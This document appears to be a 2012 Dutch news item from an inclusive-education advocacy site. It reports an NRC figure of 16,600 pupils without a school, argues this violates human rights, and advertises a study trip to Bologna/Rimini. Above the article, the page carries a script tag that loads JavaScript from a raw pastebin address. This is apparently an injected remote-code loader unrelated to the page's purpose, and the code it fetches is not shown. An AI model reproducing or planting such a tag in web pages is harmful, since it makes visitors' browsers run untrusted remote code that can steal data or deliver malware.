<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


Het Nederlands onderwijssysteem faalt: 16600 leerlingen zonder school 12 oktober 2012
Volgens het NRC van 5 oktober zijn er in Nederland 16.600 leerlingen zonder school. Ze zijn van school gestuurd of vallen uit omdat de school niet uitdagend genoeg is. hetzij dat ze niet naar school mogen of dat ze hun dagen slijten op dagverblijven voor kinderen omdat ze niet de kenmerken hebben die vereist zijn om toelaatbaar geacht te worden. Wanneer beseffen de beleidsmakers en het onderwijsveld dat dit niet toelaatbaar is en een grove schending van de mensenrechten is. Inclusief onderwijs maakt geen onderscheid in de kenmerken van een kind. (onderscheid maken is discrimineren)Inclusieve scholen laten elk kind toe en geeft elk kind, van iedere snit en IQ goed inclusief onderwijs. Wilt u het zien? neem deel aan een studiereis naar Bologna/Rimini.

<< Terug